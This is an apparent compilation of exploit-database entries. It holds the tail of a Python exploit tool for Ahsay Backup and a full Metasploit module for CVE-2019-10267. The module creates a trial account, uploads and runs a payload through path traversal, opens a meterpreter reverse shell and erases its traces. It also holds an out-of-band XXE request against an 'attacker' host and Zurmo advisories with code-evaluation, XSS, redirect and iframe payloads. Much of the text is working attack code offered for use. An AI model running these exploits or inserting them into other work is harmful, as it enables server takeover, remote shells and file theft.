    fileaction = parser.add_argument_group("File actions", "We can control the files on the server with 4 actions: list content of directory, download file (read), write file (upload) and delete file." )

    fileaction.add_argument("--action",
        help="use: delete, upload, download or list",
        default="list"
    )
    fileaction.add_argument("--localfile",
        help="Upload a local file"
    )
    fileaction.add_argument("--filename",
        help="Filename on the server"
    )
    fileaction.add_argument("--path",
        help="Directory on server use ../../../",
        default="/"
    )

    fileaction.add_argument("--recursive",
        help="Recurse actions list and delete",
        action="store_true",
        default=False
    )

    try:
        args = parser.parse_args()
        if args.add and (args.username is None or args.password is None):
            parser.error("The option --add / -a requires: --username and --password")
        if args.exploit and (args.username is None or args.password is None or args.ip is None or args.port is None):
            parser.error("The option -e / --exploit requires: --username, --password, --ip and --port")
        # if not (args.host or args.r7):
        if not (args.host):
            parser.error("The option --host requires: -a, -c, -e or -f")
        else:

            url = args.host
            url = url.rstrip('/')
            username = args.username
            password = args.password
            e = Exploit(url,username,password,"http://localhost:8080")
            if args.check:
                e.checkTrialAccount()
            elif args.add:
                if args.xss and (args.xssvalue is None):
                    parser.error("The option -x / --xss requires: --xssvalue")
                if args.xssvalue:
                    alias = args.xssvalue
                e.addTrialAccount(alias)
            elif args.exploit:
                print ("Exploiting please start a netcat listener on {}:{}".format(args.ip,args.port))
                input("Press Enter to continue...")
                e.exploit(args.ip, args.port,"../../webapps/cbs/help/en/","SystemSettings_License_Redirector_AHSAY.jsp")
            elif args.action != "upload":
                e.fileActions(args.path,args.action,args.recursive)
            elif args.action == "upload":
                if args.localfile is not None:
                    f = open(args.localfile, "r")
                    fileContent = f.read()
                    e.upload("{}{}".format(args.path,args.filename),fileContent)
                else:
                    parser.error("The option --upload must contain path to local file")

    except Exception as e:
        print (e)
        pass

# Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. (Metasploit)
# Date: 26-6-2019
# Exploit Author: Wietse Boonstra
# Vendor Homepage: https://ahsay.com
# Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
# Version: 7.x < 8.1.1.50 (REQUIRED)
# Tested on: Windows / Linux
# CVE : CVE-2019-10267

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include REXML

  def initialize(info = {})
    super(update_info(info,
'Name'        => 'Ahsay Backup v7.x-v8.1.1.50 (authenticated) file upload',
'Description' => %q{
       This module exploits an authenticated insecure file upload and code
       execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute
       the upload credentials are needed, default on Ahsay Backup trial
       accounts are enabled so an account can be created.

       It can be exploited in Windows and Linux environments to get remote code
       execution (usualy as SYSTEM). This module has been tested successfully
       on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. Because of this
       flaw all connected clients can be configured to execute a command before
       the backup starts. Allowing an attacker to takeover even more systems
       and make it rain shells!

       Setting the CREATEACCOUNT to true will create a new account, this is
       enabled by default.
       If credeantials are known enter these and run the exploit.
      },
'Author'       =>
        [
'Wietse Boonstra'
        ],
'License'     => MSF_LICENSE,
'References'  =>
        [
          [ 'CVE', '2019-10267'],
          [ 'URL', 'https://www.wbsec.nl/ahsay/' ],
          [ 'URL', 'http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe' ]
        ],
'Privileged'  => true,
'Platform'    => 'win',
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
      },
'Targets'     =>
        [
          [  'Windows x86',
            {
'Arch' => ARCH_X86,
'Platform' => 'win'
            }
          ],
          [ 'Linux x86', # should work but untested
            {
'Arch' => ARCH_X86,
'Platform' => 'linux'
            },
          ],

        ],
'DefaultTarget'  => 0,
'DisclosureDate' => 'Jun 1 2019'))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'Path to Ahsay', '/']),
        OptString.new('USERNAME', [true, 'Username for the (new) account', Rex::Text.rand_text_alphanumeric(8)]),
        OptString.new('PASSWORD', [true, 'Password for the (new) account', Rex::Text.rand_text_alpha(8) + Rex::Text.rand_text_numeric(5) + Rex::Text.rand_char("","!$%^&*")]),
        OptString.new('CREATEACCOUNT', [false, 'Create Trial account', 'false']),
        OptString.new('UPLOADPATH', [false, 'Payload Path', '../../webapps/cbs/help/en']),

      ])
  end

  def is_trial_enabled?
    res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','isTrialEnabled'),
'method' => 'POST',
'data'   => ''
    })
    if res and res.code == 200 and "ENABLED" =~ /#{res.body}/
      return true
    else
      return false
    end
  end

  def check_account?
    headers = create_request_headers
    res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','getUserProfile'),
'method' => 'POST',
'data'   => '',
'headers' => headers
    })
    if res and res.code == 200
      print_good("Username and password are valid!")
      return true
    elsif res and res.code == 500 and "USER_NOT_EXIST" =~ /#{res.body}/
      # fail_with(Failure::NoAccess, 'Username incorrect!')
      print_status("Username does not exist.")
      return false
    elsif res and res.code == 500 and "PASSWORD_INCORRECT" =~ /#{res.body}/
      # fail_with(Failure::NoAccess, 'Username exists but password incorrect!')
      print_status("Username exists but password incorrect!")
      return false
    else
      return false
    end
  end

  def create_request_headers
    headers = {}
    username = Rex::Text.encode_base64(datastore['USERNAME'])
    password = Rex::Text.encode_base64(datastore['PASSWORD'])
    headers['X-RSW-custom-encode-username'] = username
    headers['X-RSW-custom-encode-password'] = password
    headers
  end

  def exploit
    username = datastore['USERNAME']
    password = datastore['PASSWORD']

    if is_trial_enabled? and datastore['CREATEACCOUNT'] == "true"
      if username == "" or password == ""
        fail_with(Failure::NoAccess, 'Please set a username and password')
      else
        #check if account does not exists?
        if !check_account?
          # Create account and check if it is valid
          if create_account?
            drop_and_execute()
          else
            fail_with(Failure::NoAccess, 'Failed to authenticate')
          end
        else
          #Need to fix, check if account exist
          print_good("No need to create account, already exists!")
          drop_and_execute()
        end
      end
    elsif username != "" and password != ""
      if check_account?
        drop_and_execute()
      else
        if is_trial_enabled?
          fail_with(Failure::NoAccess, 'Username and password are invalid. But server supports trial accounts, you can create an account!')
        end
        fail_with(Failure::NoAccess, 'Username and password are invalid')
      end
    else
      fail_with(Failure::UnexpectedReply, 'Missing some settings')
    end
  end

  def create_account?
    headers = create_request_headers
    res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','addTrialUser'),
'method' => 'POST',
'data'   => '',
'headers' => headers
    })
    # print (res.body)
    if res and res.code == 200
      print_good("Account created")
      return true
    elsif res.body.include?('LOGIN_NAME_IS_USED')
      fail_with(Failure::NoAccess, 'Username is in use!')
    elsif res.body.include?('PWD_COMPLEXITY_FAILURE')
      fail_with(Failure::NoAccess, 'Password not complex enough')
    else
      fail_with(Failure::UnexpectedReply, 'Something went wrong!')
    end
  end

  def remove_account
    if datastore['CREATEACCOUNT']
      username = datastore['USERNAME']
      users_xml = "../../conf/users.xml"
      print_status("Looking for account #{username} in #{users_xml}")
      xml_doc = download(users_xml)
      xmldoc = Document.new(xml_doc)
      el = 0
      xmldoc.elements.each("Setting/Key") do |e|
          el = el + 1
          e.elements.each("Value") do |a|
              if a.attributes["name"].include?('name')
                  if a.attributes["data"].include?(username)
                      print_good("Found account")
                      xmldoc.root.elements.delete el
                      print_status("Removed account")
                  end
              end
          end
      end
      new_xml = xmldoc.root
      print_status("Uploading new #{users_xml} file")
      upload(users_xml, new_xml.to_s)
      print_good("Account is inaccesible when service restarts!")
    end
  end

  def prepare_path(path)
    if path.end_with? '/'
      path = path.chomp('/')
    end
    path
  end

  def drop_and_execute()
    path = prepare_path(datastore['UPLOADPATH'])
    exploitpath = path.gsub("../../webapps/cbs/",'')
    exploitpath = exploitpath.gsub("/","\\\\\\")
    requestpath = path.gsub("../../webapps/",'')

    #First stage payload creation and upload
    exe = payload.encoded_exe
    exe_filename = Rex::Text.rand_text_alpha(10)
    exefileLocation = "#{path}/#{exe_filename}.exe"
    print_status("Uploading first stage payload.")
    upload(exefileLocation, exe)
    #../../webapps/cbs/help/en
    exec = %Q{<% Runtime.getRuntime().exec(getServletContext().getRealPath("/") + "#{exploitpath}\\\\#{exe_filename}.exe");%>}

    #Second stage payload creation and upload
    jsp_filename = Rex::Text.rand_text_alpha(10)
    jspfileLocation = "#{path}/#{jsp_filename}.jsp"
    print_status("Uploading second stage payload.")
    upload(jspfileLocation, exec)
    proto = ssl ? 'https' : 'http'
    url = "#{proto}://#{datastore['RHOST']}:#{datastore['RPORT']}" + normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp")

    #Triggering the exploit
    print_status("Triggering exploit! #{url}" )
    res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp"),
'method' => 'GET'
    })
    if res and res.code == 200
      print_good("Exploit executed!")
    end

    #Cleaning up
    print_status("Cleaning up after our selfs.")
    remove_account
    print_status("Trying to remove #{exefileLocation}, but will fail when in use.")
    delete(exefileLocation)
    delete(jspfileLocation)
    delete("../../user/#{datastore['USERNAME']}",true)
  end

  def upload(fileLocation, content)
    username = Rex::Text.encode_base64(datastore['USERNAME'])
    password = Rex::Text.encode_base64(datastore['PASSWORD'])
    uploadPath = Rex::Text.encode_base64(fileLocation)

    headers = {}
    headers['X-RSW-Request-0'] = username
    headers['X-RSW-Request-1'] = password
    headers['X-RSW-custom-encode-path'] = uploadPath
    res = send_request_raw({
'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','upload'),
'method' => 'PUT',
'headers' => headers,
'data' => content,
'timeout' => 20
    })
    if res && res.code == 201
      print_good("Succesfully uploaded file to #{fileLocation}")
    else
      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
    end
  end

  def download(fileLocation)
    #TODO make vars_get variable
    print_status("Downloading file")
    username = Rex::Text.encode_base64(datastore['USERNAME'])
    password = Rex::Text.encode_base64(datastore['PASSWORD'])
    headers = {}
    headers['X-RSW-Request-0'] = username
    headers['X-RSW-Request-1'] = password
    res = send_request_cgi({
      #/obs/obm7/file/download?X-RSW-custom-encode-path=../../conf/users.xml
'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','download'),
'method' => 'GET',
'headers' => headers,
'vars_get' => {
'X-RSW-custom-encode-path' => fileLocation
      }
    })

    if res and res.code == 200
      res.body
    end
  end

  def delete(fileLocation, recursive=false)
    print_status("Deleting file #{fileLocation}")
    username = Rex::Text.encode_base64(datastore['USERNAME'])
    password = Rex::Text.encode_base64(datastore['PASSWORD'])
    headers = {}
    headers['X-RSW-Request-0'] = username
    headers['X-RSW-Request-1'] = password
    res = send_request_cgi({
      #/obs/obm7/file/delete?X-RSW-custom-encode-path=../../user/xyz
'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','delete'),
'method' => 'DELETE',
'headers' => headers,
'vars_get' => {
'X-RSW-custom-encode-path' => fileLocation,
'recursive' => recursive
      }
    })

    if res and res.code == 200
      res.body
    end
  end

  def check
    #We need a cookie first
    cookie_res = send_request_cgi({
      #/cbs/system/ShowDownload.do
'uri' => normalize_uri(target_uri.path, 'cbs','system','ShowDownload.do'),
'method' => 'GET'
    })

    if cookie_res and cookie_res.code == 200
      cookie = cookie_res.get_cookies.split()[0]
    else
      return Exploit::CheckCode::Unknown
    end

    if defined?(cookie)
      #request the page with all the clientside software links.
      headers = {}
      headers['Cookie'] = cookie
      link = send_request_cgi({
        #/cbs/system/ShowDownload.do
'uri' => normalize_uri(target_uri.path, 'cbs','system','download','indexTab1.jsp'),
'method' => 'GET',
'headers' => headers
      })

      if link and link.code == 200
        link.body.each_line do |line|
          #looking for the link that contains obm-linux and ends with .sh
          if line.include? '<a href="/cbs/download/' and line.include? '.sh' and line.include? 'obm-linux'
            filename = line.split("<a")[1].split('"')[1].split("?")[0]
            filecontent = send_request_cgi({
              #/cbs/system/ShowDownload.do
'uri' => normalize_uri(target_uri.path, filename),
'method' => 'GET',
'headers' => headers
            })
            if filecontent and filecontent.code == 200
              filecontent.body.each_line do |l|
                if l.include? 'VERSION="'
                  number = l.split("=")[1].split('"')[1]
                  if number.match /(\d+\.)?(\d+\.)?(\d+\.)?(\*|\d+)$/
                    if number <= '8.1.1.50' and not number < '7'
                      return Exploit::CheckCode::Appears
                    else
                      return Exploit::CheckCode::Safe
                    end
                  end
                end
              end
            else
              return Exploit::CheckCode::Unknown
            end
          end
        end
      else
        return Exploit::CheckCode::Unknown
      end
    else
      return Exploit::CheckCode::Unknown
    end

  end
end

# Unauthenticated XML External Entity (XXE) in Ahsay Backup v7.x - v8.1.0.50. 
# Date: 26-6-2019
# Exploit Author: Wietse Boonstra
# Vendor Homepage: https://ahsay.com
# Software Link: http://ahsay-dn.ahsay.com/v8/81050/cbs-win.exe
# Version: 7.x < 8.1.0.50
# Tested on: Windows / Linux
# CVE : CVE-2019-10266

#Ahsay is vulnerable to a OOB Unauthenticated XML External Entity
#More info https://www.wbsec.nl/ahsay/#CVE-2019-10263

Sending the following POST request will trigger the XXE:

POST /obs/obm8/user/setUserProfile HTTP/1.1
Content-Type: application/octet-stream
Content-Length: 126
Host: 172.16.238.213:80

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker/oob"> %remote;%intern; %trick;]>

On http://attacker/oob add the following content:

<!ENTITY % payl SYSTEM "file:///c:/"><!ENTITY % intern "<!ENTITY %
        trick SYSTEM 'file://:%payl;/%payl;'>">

Here it is possible to change file:///c:/ to any directory/file or internal host.

Out of Band Code Evaluation Vulnerability in Zurmo 3.2.6

Information
--------------------

Advisory by Netsparker
Name: Out of Band Code Evaluation in Zurmo
Affected Software: Zurmo
Affected Versions: 3.2.6
Homepage: http://zurmo.org
Vulnerability: Out of Band Code Evaluation
Severity: Critical
Status: Not Fixed
Netsparker Advisory Reference: NS-19-009

Technical Details
--------------------

URL: http://{DOMAIN}/zurmo/app/index.php/contacts/default/?_=1557483057859&ajax=list-view&Contact_page=&Contact_sort=&selectedIds=gethostbyname(trim('jnakpvs_zm8e35fk-ro1tuqv0l91lzlao8tgo6_5'.'6j4.r87.me'))
Parameter Name: selectedIds
Parameter Type: GET
Attack Pattern: gethostbyname(trim(%27jnakpvs_zm8e35fk-ro1tuqv0l91lzlao8tgo6_5%27.%276j4.r87.me%27))

Information
--------------------

Netsparker identified a Remote Code Evaluation (PHP) by capturing a DNS A request, which occurs when input data is run as code.

Advisory Timeline
--------------------

17th May 2019 - First Attempted Contact
25th July 2019 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Umran Yildirimkaya while testing the Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanner finds and reports security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities.

Stored Cross-site Scripting Vulnerability in Zurmo 3.2.6

Information
--------------------

Advisory by Netsparker
Name: Stored Cross-site Scripting in Zurmo
Affected Software: Zurmo
Affected Versions: 3.2.6
Homepage: http://zurmo.org
Vulnerability: Stored Cross-site Scripting
Severity: Medium
Status: Not Fixed
Netsparker Advisory Reference: NS-19-010

Technical Details
--------------------

URL : http://{DOMAIN}/zurmo/app/index.php/zurmo/group
Injection URL : http://{DOMAIN}/zurmo/app/index.php/zurmo/group/edit?id=11
Parameter Name : Group_bname%5d
Parameter Type : POST
Attack Pattern : <scRipt>alert(‘storedXSS’)</scRipt>

Proof-of-Concept
--------------------

Visit http://{DOMAIN}/zurmo/app/index.php/zurmo/group/create and enter a random group name and save it. Edit the new group from http://{DOMAIN}/zurmo/app/index.php/zurmo/group and replace the name with the attack pattern. Save and navigate back to http://{DOMAIN}/zurmo/app/index.php/zurmo/group . You’ll see the XSS pop up.

Advisory Timeline
--------------------

17th May 2019 - First Attempted Contact
25th July 2019 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Umran Yildirimkaya while testing the Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanner finds and reports security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities.

Open Redirection Vulnerability in Zurmo 3.2.6

Information
--------------------

Advisory by Netsparker
Name: Open Redirection Vulnerability in Zurmo
Affected Software: Zurmo
Affected Versions: 3.2.6
Homepage: http://zurmo.org
Vulnerability: Open Redirection
Severity: Medium
Status: Not Fixed
Netsparker Advisory Reference: NS-19-012

Technical Details
--------------------

URL: http://{DOMAIN}/zurmo/app/index.php/zurmo/default/toggleCollapse?returnUrl=http://r87.com/?{DOMAIN}/
Parameter Name : returnUrl
Parameter Type : GET
Attack Pattern : http://r87.com/?{DOMAIN}/

Advisory Timeline
--------------------

17th May 2019 - First Attempted Contact
25th July 2019 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Umran Yildirimkaya while testing the Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanner finds and reports security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities.

Frame Injection Vulnerability in Zurmo 3.2.6

Information
--------------------

Advisory by Netsparker
Name: Frame Injection in Zurmo
Affected Software: Zurmo
Affected Versions: 3.2.6
Homepage: http://zurmo.org
Vulnerability: Frame Injection
Severity: Medium
Status: Not Fixed
Netsparker Advisory Reference: NS-19-011

Technical Details
--------------------

URL: http://{DOMAIN}/zurmo/app/index.php/zurmo/group/create
Parameter Name: Group_name
Parameter Type: POST
Attack Pattern: <iframe src="http://r87.com/?"></iframe>/

Advisory Timeline
--------------------

17th May 2019 - First Attempted Contact
25th July 2019 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Umran Yildirimkaya while testing the Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanner finds and reports security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities.